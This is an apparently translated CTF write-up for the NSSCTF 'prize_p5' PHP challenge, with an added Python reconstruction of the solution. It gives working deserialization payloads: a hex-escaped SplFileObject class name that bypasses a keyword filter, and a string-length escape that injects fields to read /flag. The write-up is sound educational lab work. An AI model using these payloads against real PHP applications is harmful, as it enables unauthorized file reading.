NSSCTF prize_ p5
2022-06-09 02:02:00 【I·CE】
Source code

```php
<?php
error_reporting(0);
class catalogue{
    public $class;
    public $data;
    public function __construct()
    {
        $this->class = "error";
        $this->data = "hacker";
    }
    public function __destruct()
    {
        echo new $this->class($this->data);
    }
}
class error{
    public function __construct($OTL)
    {
        $this->OTL = $OTL;
        echo ("hello ".$this->OTL);
    }
}
class escape{
    public $name = 'OTL';
    public $phone = '123666';
    public $email = '[email protected]';
}
function abscond($string) {
    $filter = array('NSS', 'CTF', 'OTL_QAQ', 'hello');
    $filter = '/' . implode('|', $filter) . '/i';
    return preg_replace($filter, 'hacker', $string);
}
if(isset($_GET['cata'])){
    if(!preg_match('/object/i',$_GET['cata'])){
        unserialize($_GET['cata']);
    }
    else{
        $cc = new catalogue();
        unserialize(serialize($cc));
    }
    if(isset($_POST['name'])&&isset($_POST['phone'])&&isset($_POST['email'])){
        if (preg_match("/flag/i",$_POST['email'])){
            die("nonono,you can not do that!");
        }
        $abscond = new escape();
        $abscond->name = $_POST['name'];
        $abscond->phone = $_POST['phone'];
        $abscond->email = $_POST['email'];
        $abscond = serialize($abscond);
        $escape = get_object_vars(unserialize(abscond($abscond)));
        if(is_array($escape['phone'])){
            echo base64_encode(file_get_contents($escape['email']));
        }
        else{
            echo "I'm sorry to tell you that you are wrong";
        }
    }
}
else{
    highlight_file(__FILE__);
}
?>
```
The class name can be written with `\xx` hexadecimal escapes (PHP's `S:` serialized-string type), so the literal word "object" never appears and the `/object/i` check is bypassed:

```
?cata=O:9:"catalogue":2:{s:5:"class";S:13:"SplFile\4fbject";s:4:"data";s:5:"/flag";}
```
String escape:

```
?cata=CTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFCTFhellohello";s:5:"phone";a:1:{i:0;i:1;}s:5:"email";s:5:"/flag";}
```

Replacing CTF…hello with hacker changes the length by 53 characters, and the part appended after it, from `";` through the closing `}`, is 53 characters in total. The declared length of `name` therefore stops right after the hacker-filled text, and the appended `phone` and `email` fields are parsed as the object's own properties.
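As an added example (not the writeup author's script), a Python reconstruction of both tricks above: the `S:` hex-escaped class name from the first payload and the length accounting behind the string escape in the second. `abscond` is a port of the challenge's filter; the phone and email values passed in are constructed.

```python
import re

# Constants come from the challenge source; the rest is an added reconstruction,
# not the writeup author's script.
FILTER_WORDS = ("NSS", "CTF", "OTL_QAQ", "hello")
REPLACEMENT = "hacker"
# The smuggled tail from the second payload: it closes `name`, injects
# phone (an array) and email (the file to read), then closes the object.
TAIL = '";s:5:"phone";a:1:{i:0;i:1;}s:5:"email";s:5:"/flag";}'

def abscond(s: str) -> str:
    """Port of the challenge's abscond(): every filter word becomes "hacker"."""
    return re.sub("|".join(FILTER_WORDS), REPLACEMENT, s, flags=re.IGNORECASE)

def php_str(s: str) -> str:
    """PHP serialize() form of a string: s:<byte length>:"<bytes>";"""
    return f's:{len(s.encode())}:"{s}";'

def php_s_escaped(s: str, escape_chars: str) -> str:
    """PHP's S: string type with the chosen characters written as \\xx hex escapes.
    The declared length is the decoded length; this is how the first payload
    spells SplFile\\4fbject for SplFileObject without matching /object/i."""
    body = "".join(f"\\{ord(c):02x}" if c in escape_chars else c for c in s)
    return f'S:{len(s.encode())}:"{body}";'

def padding_for(extra: int) -> str:
    """Filter-word prefix whose replacement grows by exactly `extra` bytes:
    CTF -> hacker gains 3 bytes per hit, hello -> hacker gains 1 byte per hit."""
    n_ctf, rest = divmod(extra, len(REPLACEMENT) - len("CTF"))
    return "CTF" * n_ctf + "hello" * (rest // (len(REPLACEMENT) - len("hello")))

def serialize_escape(name: str, phone: str, email: str) -> str:
    """serialize() of the challenge's escape object (three public properties)."""
    body = (php_str("name") + php_str(name) + php_str("phone") + php_str(phone)
            + php_str("email") + php_str(email))
    return f'O:6:"escape":3:{{{body}}}'

def build_escape_payload(tail: str = TAIL) -> str:
    """The `name` value of the page's payload: padding, then the smuggled tail."""
    return padding_for(len(tail)) + tail

def tail_is_parsed_as_fields(filtered: str, tail: str) -> bool:
    """True when the declared length of `name` in the filtered serialization ends
    exactly where `tail` begins, so unserialize() reads the tail as the phone and
    email properties (PHP ignores any bytes after the outer object closes)."""
    m = re.match(r'O:6:"escape":3:\{s:4:"name";s:(\d+):"', filtered)
    if not m:
        return False
    return filtered[m.end() + int(m.group(1)):].startswith(tail)
```

`padding_for(53)` reproduces the page's 17 × CTF + 2 × hello prefix, and `tail_is_parsed_as_fields` shows why one CTF too few or too many breaks the alignment.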